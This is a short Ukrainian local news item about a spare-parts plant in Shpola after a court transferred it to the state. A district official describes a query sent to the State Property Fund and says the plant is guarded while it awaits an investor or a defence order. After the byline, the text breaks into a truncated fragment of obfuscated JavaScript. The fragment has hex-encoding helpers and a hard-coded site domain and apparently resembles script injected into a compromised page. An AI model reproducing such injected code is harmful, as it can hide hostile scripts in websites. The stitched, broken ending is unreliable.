Яка подальша доля заводу запасних частин?

На це питання Юрій Козоріз надав наступну відповідь. Із нинішнім керівництвом підприємства Шполянська райдержадміністрація підтримує постійний зв'язок. Після винесення рішення суду, яким завод переходить у власність держави Україна, поки що не послідувало жодних кроків щодо визначення його подальшої долі. Тому до Фонду державного майна направлено лист-запит Шполянської райдержадміністрації з проханням надати детальні роз’яснення щодо проведення ШЗЗЧ у власність держави.

Відповідь за чинним законодавством має надійти впродовж місячного терміну. За словами Юрія Олексійовича, на підприємстві працює охорона, база зберігається у повному переліку, а керівництво підприємства очікує на визначення остаточного статусу заводу — чи прийде інвестор, чи тут буде організоване держзамовлення на українську оборону.

Наталія ДАВИДЕНКО.

o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "shpolyanochka.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e